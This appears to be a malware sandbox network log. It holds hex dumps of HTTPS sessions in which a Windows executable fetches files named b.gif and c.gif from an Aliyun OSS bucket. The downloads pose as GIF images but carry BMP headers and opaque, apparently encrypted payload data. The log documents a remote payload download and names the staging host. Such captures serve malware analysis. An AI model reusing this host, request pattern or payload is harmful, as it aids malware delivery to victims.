2025-03-23 02:15:49 UTC	4096	IN	Data Raw: b3 fc 3e 23 6f bc b9 ba f7 37 75 f6 36 8c e5 f2 8f 4f 06 8e 4a 45 21 ce cb cc 85 47 83 f4 f9 9a 5e 99 25 9e 5e 94 fd fa e8 15 22 cb 05 3f e1 e2 ab 6f 60 2e e3 e8 e9 a2 66 a0 c9 be a7 79 74 1a f3 f4 f5 c5 25 b0 74 7f 33 f8 fd fe be b8 99 02 03 04 4d 85 c7 00 41 83 8e 84 0d 0e 0f f8 f1 19 13 14 5d 9d 92 d0 1d 1a 1b 54 94 5a 3b 40 e6 66 07 74 30 26 27 68 ee 6e 0f 78 2c 2e 2f 30 ce 27 85 eb 35 36 b4 c0 38 72 b6 78 19 6e 77 c9 05 66 03 0c c8 03 b7 47 dd 89 03 c5 09 6a 07 63 98 ad 46 21 8a 56 57 10 d4 16 7f 1c a2 4b 3d bf 61 62 e6 a4 10 6a e3 b3 1c 62 e6 24 6e 86 d1 8e 8e 8d 3b ff e9 52 a7 7d 79 7a 33 fd b9 be 7a 80 81 df 40 48 cd 07 6b 10 89 8a 8b bf 5f c6 02 dc b5 b2 d7 19 d7 fe 7f c1 92 9a 9b d4 10 d2 bb 80 5e b7 ed 7b a5 a6 51 ec 8d f6 aa 14 a7 ae af b0 d7 Data Ascii: >#o7u6OJE!G^%^"?o`.fyt%t3MA]TZ;@ft0&'hnx,./0'568rxnwfGjcF!VWK=abjb$n;R}yz3z@Hk_^{Q
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: b2 fc 36 72 9f 7b f1 39 57 94 39 77 ca ca 29 9d c0 c4 c5 2e 75 cb c9 ca 7b cd 85 4d 0b f8 12 1e 1f 18 9d ed 1d ac c0 92 58 1e d4 96 52 a1 e8 aa c8 34 6f ee dd e4 f9 9f e1 a4 12 2e 6b 39 84 00 c0 34 36 ed 37 7b 31 fb 38 30 b5 7b 36 74 66 8a 57 20 15 4e 84 e4 41 8b 32 6f 7e 63 ef 65 42 91 6a 0c 11 63 5a 93 58 3a 36 3c 18 8d 06 a3 d9 20 54 64 6d ad 66 18 61 af eb 58 1a 66 4c 60 35 b7 e1 40 24 7e 34 69 01 72 b0 75 15 d6 15 40 41 42 a8 64 ae 58 b1 48 59 3e 52 04 c6 0f 67 18 da 5a 1b d1 9c 22 5a 10 d2 5b 13 d7 1d 4e a0 75 29 b3 63 64 2d e5 a3 20 aa a6 a7 a0 25 91 8d bc 31 21 3b f7 99 56 3f f3 a0 92 f9 7d 7d 7e 37 0b d1 da 68 8d cd bf 9d fc 9b c2 00 de 85 c6 0a 42 e4 60 1e d6 94 de 14 5c b9 c1 58 af 5d 75 69 6c e9 c1 a1 ec a6 67 24 d2 ad aa d7 ba e1 cd e5 b4 f9 Data Ascii: 6r{9W9w).u{MXR4o.k9467{180{6tfW NA2o~ceBjcZX:6< TdmfaXfL`5@$~4iru@ABdXHY>RgZ"Z[Nu)cd- %1!;V?}}~7hB`\X]uilg$
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: ab fc b6 6e f6 01 b8 ba bb bc f0 35 79 88 4a 11 8b 4f 0b 2e b9 da c9 ca 20 fc 85 43 98 d8 98 59 9d fc 3d 11 27 27 26 96 50 2c e4 81 c7 94 ed 0a 79 1f 1a 19 af 8b b6 f2 a3 ef 35 a3 64 36 b9 79 20 bc 7e 38 1f b9 eb fa fb 6c b5 75 a3 24 31 4a 88 70 21 3e 4f 83 75 2e 4b 44 8e ca 2f 51 4f d1 fb 4d 20 16 17 88 51 91 df 54 94 46 17 6c a8 62 3b 71 73 71 66 7c 68 7f 6a 7a 6c 79 67 b3 dd 52 7f bf 99 12 f7 38 39 3a 76 b7 c4 72 b4 a2 0d cf 0b 54 0d cd ae 05 c2 8f 02 c7 9a 07 c4 9c b9 25 a4 ab aa 1a dc d4 7d 8a 5b 5c 5d 12 d4 90 29 e9 d7 40 ad 66 67 68 24 ef a2 18 63 22 e4 b6 39 f9 a3 3c fe bb 9f a5 87 85 84 34 f6 f2 5b 58 81 82 83 0f dc 8e 0c b1 61 55 71 73 72 c6 ec de 9d df 18 5a d9 1d 13 bc 29 9a 9b 9c d5 9d 5e 2a 2d 86 5b a4 a5 a6 ef 23 7c 22 e7 88 fd e7 24 7c fd Data Ascii: n5yJO. CY=''&P,y5d6y ~8lu$1Jp!>Ou.KD/QOM QTFlb;qsqf\|hjzlygR89:vrT%}[\])@fgh$c"9<4[XaUqsrZ)^*-[#\|"$\|
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: fa 3f 78 5e 6d 53 46 45 50 a2 f9 35 1b e4 49 c2 c3 c4 8d 4d 73 ec 49 ca cb cc 81 45 b3 f4 a1 9e 58 b8 f1 fe 5c a4 fd fa 52 a0 f9 fa 36 ec 1e 1d 1c 0c fd 04 18 17 6a 92 db ec 93 e6 07 fd 13 0d 0c 0b bd c6 74 07 06 8e fe bd c6 02 80 24 45 89 c4 4c 8e d0 4e 83 c6 e2 99 e0 f2 f1 47 93 d5 22 52 4b 54 48 56 45 58 46 44 42 46 dd f7 6d 04 22 23 b4 cd 61 02 28 29 ba e7 e0 65 a7 73 14 39 7a ba 58 11 26 7f b1 4d 1e 23 6b 75 bd d3 60 09 c9 aa 0d ce be 0e c3 81 02 c0 be a5 d9 a3 af ae 1e de 18 71 1e 1b d3 9e 12 d0 8a 15 d5 92 eb b9 8a 05 83 9a 99 2b e3 ae 22 e0 ba 25 e5 a2 98 71 9e 8c 8b 4e ae 09 5b 3d f1 b8 34 f0 32 5b c8 c9 09 54 6c 9d 6a 78 77 cd 01 40 c0 06 49 c7 1b 47 da 18 59 7d 85 7b 67 66 71 8b d0 16 59 d7 2b 77 ea 28 69 4d 6d 4c 57 56 21 73 e4 26 c2 8b 88 3a Data Ascii: ?x^mSFEP5IMsIEX\R6jt$ELNG"RKTHVEXFDBFm"#a()es9zX&M#ku`q+"%qN[=42[Tljxw@IGY}{gfqY+w(iMmLWV!s&:
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: b2 b5 34 fe 3c a8 f4 31 73 f4 3e 7e b7 8c c2 08 8b 33 17 8f f4 19 80 e9 18 b8 25 86 44 80 29 56 01 a0 84 52 21 ac 9e 92 1a 36 cd 5a 0d 94 d8 66 15 90 ca ae 26 02 f9 6e 39 98 cc 6a 19 84 e6 33 19 e4 71 24 83 f2 7d 0c 8e 45 b5 73 bb 08 fe c1 4b 89 41 0e f9 cb 41 87 4f 04 f0 cd 47 9d 55 1a ef d7 5d 9b 53 10 e2 d9 53 91 59 16 e5 e3 69 af 67 2c dc e5 6f a5 6d 22 d3 ef 65 a7 73 14 39 7e ba 78 11 16 60 70 ba d6 1b 75 b6 e7 76 cb b9 c9 49 ac 01 60 47 48 d9 02 c0 83 a5 5d 4f 50 51 c2 d8 5f bd d1 71 58 59 12 d0 00 79 6e 17 e3 a5 42 3c a7 25 35 2f eb 85 5a 23 e7 b4 ee 52 c0 2e 73 73 74 7a f3 de 78 79 7a c3 7d 7d 7e 7f 07 84 0d dc 85 85 ce 0c 89 02 82 0e 45 f8 b0 c7 1b 94 25 de 95 95 de 1c 8d 19 c5 9a 9c d5 a5 4f d4 83 29 6b 27 44 99 ef 9b 6b e2 78 64 e4 14 df 98 68 Data Ascii: 4<1s>~3%D)VR!6Zf&n9j3q$}EsKAAOGU]SSYig,om"es9~x`puvI`GH]OPQ_qXYynB<%5/Z#R.sstzxyz}}~E%O)k'Dkxdh
2025-03-23 02:15:50 UTC	4096	IN	Data Raw: ef 90 85 fe 34 7c 99 e5 78 70 f5 37 e3 e4 c9 8a 4a a8 e1 d6 8f 41 bd ee d3 9b 8c 98 8e 87 99 51 3f f4 9d 5d d6 eb 34 96 50 25 95 55 cf a8 64 30 ec 60 8d e7 e7 e8 a5 61 fe b1 d3 ef ef b1 7a 38 ba 7f 07 be c4 ca 7a 1b c4 b1 76 34 b7 d3 cf 4e 30 4e 0d 4f 8c d2 41 39 51 1c 44 dd c6 58 c2 d9 5f 2f de 19 92 bf 19 1a 1b 54 36 c0 a7 20 23 22 23 6c e4 dd 24 60 12 f2 63 a7 d6 66 20 77 c9 bf 76 14 7d 35 cc 70 36 7e c3 74 06 c5 4d 5e 05 cf 06 4c 0d cd 90 00 c2 84 a3 81 70 4e 4f 63 98 1e d8 a4 bd 2d 4f 58 59 17 de aa 28 76 17 ed 1a 66 22 dc 6d 66 67 68 21 e1 bc 24 e6 a0 87 d9 4c 72 73 47 bc 3a fc 88 91 2d 63 7c 7d 33 fa 76 8e 06 49 84 85 86 cb 03 9c 35 b6 8d 8d c3 02 9c 4f db 1e 88 6b df 1c 6e d1 11 50 d5 b6 57 d7 23 60 a5 eb 65 4c a5 eb 93 62 e2 a4 eb 60 e6 2a 79 c5 Data Ascii: 4\|xp7JAQ?]4P%Ud0`az8zv4N0NOA9QDX_/T6 #"#l$`cf wv}5p6~tM^LpNOc-OXY(vf"mfgh!$LrsG:-c\|}3vI5OknPW#`eLb`*y
2025-03-23 02:15:50 UTC	4096	IN	Data Raw: b3 b4 fd 3d fa 50 f1 31 f2 dc 55 ad b6 c0 c1 8a 48 89 2d 8e 4c 81 a1 22 cd c5 cd ce 87 5b 9c 3a 9b 5f 9c 9e 3f 21 d1 da db 94 56 93 37 a8 6a ab b3 0c 09 ee e7 e8 a1 61 a6 04 a5 65 a6 88 19 2d fb f4 f5 be 7c b5 11 b2 70 75 7d fe ff 00 e9 cd 0b 04 05 4e 8c 45 e1 42 80 85 cd 0d 0f 10 f9 ad 1b 14 15 5a 9a 55 39 56 96 59 ed 56 92 75 09 6a ae 69 3d ce f1 d5 d6 d5 67 a1 60 ce 63 bd 74 ca 7b b9 60 d2 7f b5 74 22 d3 05 c0 c1 c0 08 c2 86 03 19 86 8a 8b 84 01 c3 17 68 45 19 07 d3 bd 72 1b df ac 1e dc 82 11 d1 d2 cc 5d 5e 5f 28 e4 ab 17 48 8d bd 40 68 69 22 e0 e3 fd 6e 6f 70 39 49 7e 41 37 77 77 0c 6e 32 f6 79 59 50 7e 80 c9 b9 4b f0 8e 05 fe 98 89 ff 8e 64 39 ab 8f 90 d9 1b 0c 04 95 96 97 d0 1c 41 ef 94 d5 15 54 48 b5 87 a3 a4 ed 2d fb 8c 99 e2 28 68 8d f1 6c 7c f9 Data Ascii: =P1UH-L"[:_?!V7jae-\|pu}NEBZU9VYVuji=g`ct{`t"hEr]^_(H@hi"nop9I~A7wwn2yYP~Kd9ATH-(hl\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49734	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:15:51 UTC	106	OUT	GET /b.gif HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:15:51 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:15:51 GMT Content-Type: image/gif Content-Length: 3679381 Connection: close x-oss-request-id: 67DF6ED72A057735340786E0 Accept-Ranges: bytes ETag: "13E05500C7D6372C50091A56CB1EB698" Last-Modified: Sun, 23 Mar 2025 01:37:55 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 14171735027348075836 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: E+BVAMfWNyxQCRpWyx62mA== x-oss-server-time: 15
2025-03-23 02:15:51 UTC	3548	IN	Data Raw: 42 4d 6a 08 00 00 00 00 00 00 36 00 00 00 28 00 00 00 21 00 00 00 15 00 00 00 01 00 18 00 00 00 00 00 34 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 68 98 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2d 3a e2 46 51 e5 d9 db fa ff ff ff ff ff ff ff ff ff ff ff ff fd ed e3 f7 b7 8d f2 8c 48 f0 80 36 f0 80 36 f0 7f 36 f0 80 36 f0 7f 36 f0 80 36 f0 80 36 f0 80 36 00 2f 3d e0 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e2 2e 3a e2 2e 3a e2 39 45 e4 b2 b7 f4 fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 fc e4 d5 f9 cb ad f7 b9 91 f6 b1 83 f6 b1 84 f7 ba 91 f9 cb ad fc e5 d6 00 2f Data Ascii: BMj6(!4=h.;.;.;.;.;.;.;.:.:.:.:.:.:.:-:FQH66666666/=/;/;/;/;/;.;.;.;.;.;.;.;.;.;.:.:9E/
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: 68 90 d2 b3 cf 71 1e c6 76 80 e8 32 cd f6 a0 15 aa 3e 43 08 c3 aa 5f 80 3c 36 ca 74 e2 9d 41 60 b6 e5 14 29 c4 aa 4b 15 f3 4b 71 86 65 e1 b0 0d 81 96 ef 17 3c 47 4a ef 6c 92 91 3f 53 9e ed c9 9c 93 87 ff 06 07 8f 47 80 59 0c a2 7b 7c bf 7e 9d 5d 58 13 65 72 0d fb b1 2a 27 80 12 57 58 07 f2 26 55 ef d0 31 0f f0 b7 de 98 aa 56 b2 50 08 6e a3 2c 29 b2 47 53 20 da 1a 7f 74 6e 9e 27 fd 80 1e d9 a3 40 ff 63 ff 59 4e 3c cf e9 97 51 89 56 c0 c7 02 e3 f4 f2 90 71 e8 4c 0a 4a fb 34 28 53 15 32 20 50 a5 b3 c4 02 51 9d 54 fd 48 6d b0 29 36 a4 04 11 62 94 cb 43 4c e7 ae dc ea b5 eb c5 34 fb 14 54 80 16 0c 7a 89 21 be 78 4d ac 24 f9 a1 55 d5 da 04 ea 83 db 25 0f d4 8e 19 76 be 3c 83 84 84 92 ba 66 8b 7e 43 95 11 ac a9 ae 3f 06 99 29 44 90 68 81 54 b9 d7 34 b6 3d 9b 5a Data Ascii: hqv2>C_<6tA`)KKqe<GJl?SGY{\|~]Xer*'WX&U1VPn,)GS tn'@cYN<QVqLJ4(S2 PQTHm)6bCL4Tz!xM$U%v<f~C?)DhT4=Z
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: cb 00 d6 06 59 91 79 00 c2 b0 22 ab 67 ed 50 39 de b4 07 99 db d5 0d ce 19 88 de 01 cb 97 c1 94 03 21 c7 74 cc 79 cc 25 e3 36 41 ba 09 1b 15 27 e6 ea 25 c1 5d 93 76 0d b2 02 62 a4 79 0d 3e e7 55 80 c9 f2 d3 ee ab bf ba 3e 41 c6 e4 40 bd f0 d8 60 6c 70 8b 68 ab 71 b5 ba 26 b4 32 08 2c fe d4 a8 29 0d 99 ec 5f e0 fd af a4 57 bd bc a9 a7 0a d6 ac 30 32 54 e3 92 13 33 04 6a d9 2e 4e 04 35 30 a1 88 aa 41 c8 19 14 1e a2 f9 87 04 26 37 ca 7b 43 12 2f 27 2e 3b 54 6c 6d 05 08 50 a4 94 eb 68 4a 52 25 94 04 a0 c3 0b 04 f1 04 14 1b cf 53 71 94 b6 f2 92 7a 4b 87 af d1 56 74 2e 46 eb cc e7 31 c3 af 08 1d 35 e6 db dd 8d 9a ee b0 5c 49 64 74 b0 da e0 02 f1 42 d8 9a 3e 49 f8 f4 81 01 41 5f 19 c0 e4 84 c0 71 69 1b 6a a9 c1 f9 50 38 89 38 23 5f f5 18 f6 cf cf 20 40 62 3f 58 Data Ascii: Yy"gP9!ty%6A'%]vby>U>A@`lphq&2,)_W02T3j.N50A&7{C/'.;TlmPhJR%SqzKVt.F15\IdtB>IA_qijP88#_ @b?X
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: d8 74 ec 8b fc 8d 55 fd 6e b0 67 5f 59 ee b6 19 3e cd 09 ed ae 86 73 73 ca 85 f6 5f 60 fd 47 61 13 ed e8 2c 0b 0a 44 04 e2 51 af 82 5d aa f8 91 8a 31 37 32 b5 56 98 99 e0 f4 57 33 38 38 b0 ac 13 16 a3 e7 a1 42 b3 7e 8d b7 2e 77 3d 13 b9 3c 75 59 d1 e7 e1 56 15 3e 19 18 54 65 60 7e 40 37 57 c2 e4 f2 4d bd f5 fc 49 17 e7 00 f1 6b d7 07 36 14 6f 8a 89 7c 9c df 2c a6 57 da 08 7c 64 d3 d5 62 3f b0 97 96 b4 66 b0 da 29 25 49 21 64 ea 0f 76 95 43 8e a4 a3 18 5e 0d ec 1b dc 63 ab de 0c 1c b6 bb 35 e5 01 a9 89 08 10 bf b9 0e 48 65 42 43 3d 6c 83 5a 03 ae 25 54 6c a7 8f 8a 3f 66 42 a1 50 95 66 31 93 7d c5 98 ff 02 d5 02 7b 63 65 d2 95 02 25 24 68 fa 7f 16 23 4e be 9d fe 1c 56 3f 0a 6f 22 43 8a 44 fd b7 76 9e 8e 2a d6 89 25 40 47 f4 b4 eb 0a f5 32 8d a4 a7 93 01 ce Data Ascii: tUng_Y>ss_`Ga,DQ]172VW388B~.w=<uYV>Te`~@7WMIk6o\|,W\|db?f)%I!dvC^c5HeBC=lZ%Tl?fBPf1}{ce%$h#NV?o"CDv*%@G2
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: d1 a9 20 33 5d 20 2a 54 73 de 0a 96 75 de 1d 90 9b 4e b6 5c 1d 96 f9 92 a0 5b cd 38 e6 a2 8a c6 66 ff d3 a7 99 01 a4 ae 65 65 dd 8a 81 47 07 b0 df 7d ba f3 a9 cf fe 71 9e a3 64 1f f4 cf a8 c3 14 6a 2b a4 cb f9 84 52 16 80 f4 ce d9 82 36 a4 d4 7d 69 32 54 2d 9e d0 59 34 45 64 10 c8 04 3e 88 f2 c9 72 e8 c9 d0 1d b6 f0 21 60 85 c6 4f 1e ac a4 40 7a f2 d2 4b 87 24 a8 67 c6 3d 18 ac d7 eb b2 40 32 c8 e1 50 ca 08 d9 ed df 77 36 62 fc 55 9c ea 5a 0f 70 9b b4 02 d8 3c d5 95 1e 71 8a 66 c8 1d 36 1f 3a 7f c7 84 c3 f6 9f 29 c4 b2 9a 0d 7b 2e d4 21 6c 9a 73 a5 f0 26 06 d1 cc 7a 50 45 e9 9e 6f 79 f7 02 79 6d da 8e 84 b1 d5 42 d3 bf 67 c3 73 e5 45 05 54 e8 10 4c dc b2 32 02 63 bf 47 33 a3 75 d5 f5 e4 d8 20 04 b4 02 e2 aa cb 1f e7 fb 6b a5 f9 69 21 56 98 46 9c e5 94 30 Data Ascii: 3] *TsuN\[8feeG}qdj+R6}i2T-Y4Ed>r!`O@zK$g=@2Pw6bUZp<qf6:){.!ls&zPEoyymBgsETL2cG3u ki!VF0
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: 25 71 37 cf f1 95 83 4a 2c ac dc a5 39 c1 55 bd 53 d3 0b 72 86 7e 32 4a 1c bc 24 5d 09 f1 55 fd db 5b 3b a2 86 5e 52 aa 3c 9c 54 0d a9 d5 3d 26 dc 65 07 60 f6 09 84 45 95 b7 a4 d6 d5 71 e0 1a cb d4 d7 c0 7b 59 44 e9 d5 e7 06 5c 82 fe c3 23 5a 3b ac 92 cb a7 e6 27 81 6e a9 95 c9 20 dd 68 a5 71 03 df cd 1b cd 69 49 5a 83 cc 2c d4 0d b0 ed 6e 42 0f 1e 45 1d 19 d8 49 4c db 07 ae 9f d8 f8 00 a9 0c d1 52 c6 73 7a 11 e1 1d ac 3d d8 37 d3 d1 ec 32 54 4e 3a db 12 e8 0c 52 f4 59 42 e4 d2 a8 8c 82 5c 51 ba 5c 12 9f b4 7d 84 4e 82 24 22 3f cc 62 4c 61 ba 9b 4b fc 4b c4 3c 94 5d bd cd c1 d3 a3 37 d5 ee 78 33 03 75 24 ee ba 82 46 1d 06 91 d8 f4 11 14 23 f5 50 18 f7 95 33 eb e7 32 d9 a2 0c 95 dc d6 79 2e e2 ce 86 1f 84 c3 b5 a1 cd f3 e9 fb 20 ec 12 94 a3 be 1d f3 aa 60 Data Ascii: %q7J,9USr~2J$]U[;^R<T=&e`Eq{YD\#Z;'n hqiIZ,nBEILRsz=72TN:RYB\Q\}N$"?bLaKK<]7x3u$F#P32y. `
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: 8b 2a 95 b2 18 9e 49 de 10 3e 7a 31 3d 66 1b 7f ba 05 35 64 45 08 d9 69 56 70 99 90 0c 28 43 50 09 76 df da 95 b5 53 ce 67 b8 c3 0d ec e6 67 12 b7 f5 41 94 f7 97 6a 68 31 0f ee 2d 90 90 a7 9a f6 4b 40 74 01 09 10 92 bc 0b 77 7c 25 20 be 43 fe 3f cc f2 0e e8 4c 1d da b1 02 c3 09 83 8f c8 ce 84 41 08 de 60 a0 d5 f2 7b 5c 3c 08 44 5d 26 ad a2 fb fc 1c 1d a0 c2 24 b5 1c 00 c3 ba 8a 64 ef a0 3c 5d 11 8a 6f fe a4 b7 bb e4 e4 b7 72 43 0f 91 0c 08 69 5f fc bf 0d 1f c6 7f 16 24 de 4d dd d2 8b 86 3a 3b 74 f3 4e 84 1b bd d1 c8 30 a8 d1 38 8c 3b a3 fb ea e8 b1 b8 37 f4 49 7b 2c dd 16 d3 e6 79 8d e7 6a f4 f9 a2 a8 49 4a 07 8a 87 d2 99 06 0f 91 4f a6 db 79 59 06 0c 55 5d 11 ca 77 ed c0 3e a1 fa 65 d8 9f c6 a2 22 bd e6 bd a6 fd 1f 8f b3 e5 0c fc e1 55 25 0c ff 21 2e 77 Data Ascii: *I>z1=f5dEiVp(CPvSggAjh1-K@tw\|% C?LA`{\<D]&$d<]orCi_$M:;tN08;7I{,yjIJOyYU]w>e"U%!.w
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: 9b 23 ff 03 9f 25 c9 0c 22 e5 aa 2b f7 5f 5c 6d 61 cf 79 ea 18 d9 1e d1 7f 6a b1 26 38 05 c6 61 67 0e 11 b2 90 e1 76 85 af 9e c9 7e 80 81 06 ad 5f 6a 51 b2 50 5d ce 21 ef c6 1a a8 80 de b6 26 ae 00 ef 20 38 4e 36 ae f6 e0 1f c8 67 7e a1 be b1 58 47 00 cf 86 09 9e 66 80 28 00 d8 0e 06 c6 8e 8b d0 f7 72 fa c8 ed 54 1a af bb 2a 9b 99 dc 64 3e 88 c7 e4 08 5e e8 68 45 2f 0e 41 4f f8 05 ba b0 eb 7d f1 84 94 de 80 30 59 4d af 18 e7 c0 17 a5 37 69 4a 71 25 97 17 92 a4 4d 21 40 96 d7 01 0c a0 75 83 ae 58 81 cd e4 32 33 05 40 6c b9 6f 9a 4c 75 39 80 76 ff c9 74 38 45 14 89 08 fe 02 1f 5e 90 5c e6 d0 46 f2 ff a6 8f 54 f9 50 41 3a 07 76 18 24 f9 18 be 22 28 f6 7f 54 7e 90 d6 c2 b8 97 56 70 4b 8c f3 64 9d b0 9e 8c ec 12 92 6d 59 b4 ab 5a 7f 95 cd f5 57 70 4f d8 95 03 Data Ascii: #%"+_\mayj&8agv~_jQP]!& 8N6g~XGf(rT*d>^hE/AO}0YM7iJq%M!@uX23@loLu9vt8E^\FTPA:v$"(T~VpKdmYZWpO
2025-03-23 02:15:51 UTC	4096	IN	Data Raw: 43 32 a5 66 e4 99 9a 7d 8b 82 3d 8a 74 19 2a f1 d3 fa 25 ea 26 04 7a 98 52 8d 90 93 25 23 67 f4 b2 84 62 25 2e 77 55 9b cf 10 5a 74 a4 19 2e e7 71 d7 a5 f0 a6 c0 02 f9 dc 03 83 f6 da 0d b2 da 0e f6 98 e9 a7 20 87 ab 87 4e ad b2 0e 53 24 e9 6e b0 1f a8 9b a8 d6 1d 46 4b de 2a 0d c4 19 cd ca 63 92 aa 99 cc 01 b5 b6 33 36 f2 dd 2c c1 25 5a 5b e6 0a 69 4c fd 0d 12 b3 62 ba d1 cc 05 44 9e de 9e 76 1f 3e ed 65 91 f9 d2 90 be 50 c3 b6 ed 63 a5 e5 52 2a f2 28 a3 ba b1 03 1d 6d 3e f0 1a e4 a7 9e 01 95 32 5f ca 9f 73 0a c4 5c 11 3a e2 ef f2 7a db de 1c 38 89 dc fd fe 2d ce 5f 60 1f 63 a6 fb f4 6b 61 5c 0b e0 16 17 bc 03 e9 1c a3 64 e6 83 a4 1f 19 7c 63 8c 56 03 f4 47 b9 b0 6b f8 e6 bb b4 1f 29 54 c3 08 cc d4 f1 c6 80 1e 2a 01 ac 31 36 65 cc d9 5b 04 48 1a 47 f3 30 Data Ascii: C2f}=t%&zR%#gb%.wUZt.q NS$nFKc36,%Z[iLbDv>ePcR(m>2_s\:z8-_`cka\d\|cVGk)T16e[HG0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49735	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:15:59 UTC	106	OUT	GET /c.gif HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:15:59 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:15:59 GMT Content-Type: image/gif Content-Length: 10515 Connection: close x-oss-request-id: 67DF6EDF5E34143436EB4710 Accept-Ranges: bytes ETag: "0035DC4371138478A84E3BAA8454C764" Last-Modified: Sun, 23 Mar 2025 01:37:43 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 16449065320512397379 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: ADXcQ3EThHioTjuqhFTHZA== x-oss-server-time: 9
2025-03-23 02:15:59 UTC	3551	IN	Data Raw: 42 4d 6a 08 00 00 00 00 00 00 36 00 00 00 28 00 00 00 21 00 00 00 15 00 00 00 01 00 18 00 00 00 00 00 34 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 68 98 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2d 3a e2 46 51 e5 d9 db fa ff ff ff ff ff ff ff ff ff ff ff ff fd ed e3 f7 b7 8d f2 8c 48 f0 80 36 f0 80 36 f0 7f 36 f0 80 36 f0 7f 36 f0 80 36 f0 80 36 f0 80 36 00 2f 3d e0 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e2 2e 3a e2 2e 3a e2 39 45 e4 b2 b7 f4 fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 fc e4 d5 f9 cb ad f7 b9 91 f6 b1 83 f6 b1 84 f7 ba 91 f9 cb ad fc e5 d6 00 2f Data Ascii: BMj6(!4=h.;.;.;.;.;.;.;.:.:.:.:.:.:.:-:FQH66666666/=/;/;/;/;/;.;.;.;.;.;.;.;.;.;.:.:9E/
2025-03-23 02:15:59 UTC	4096	IN	Data Raw: 3f 2e be 0d b9 bd d2 2c 76 2a de 6f a7 ce 06 64 b8 8f 75 21 4d 1c e9 3b 72 26 7d 30 cf c5 06 fe 82 c2 cf e4 bd 53 0a eb 71 86 4f d2 f9 35 77 8a c3 bc 72 ad d6 65 e2 e0 64 70 c0 d4 dd 6b 1d 49 da 2e 07 4b 1d 43 36 53 ae 0a 6c 7f 6b 2d 42 33 fd 7d 70 45 90 a0 8c fc a7 a3 08 e2 97 06 2f 8d bf 82 1c 37 f1 87 24 e2 29 9a b6 82 c8 ce 26 63 24 57 cd 54 26 19 64 96 06 df e6 1a c2 e2 62 48 99 c2 35 ab 8e 80 ce a9 d3 10 33 81 97 14 69 83 bb 2c 3f c2 f0 fa 32 48 fb bc 46 05 b8 52 36 46 9e 5a 48 40 ff 46 75 f7 71 bb 47 28 70 85 3f 99 77 2d ef 0c d4 a4 ef b6 56 d5 ef b4 73 79 83 c8 d9 fd 5f e0 52 3f 12 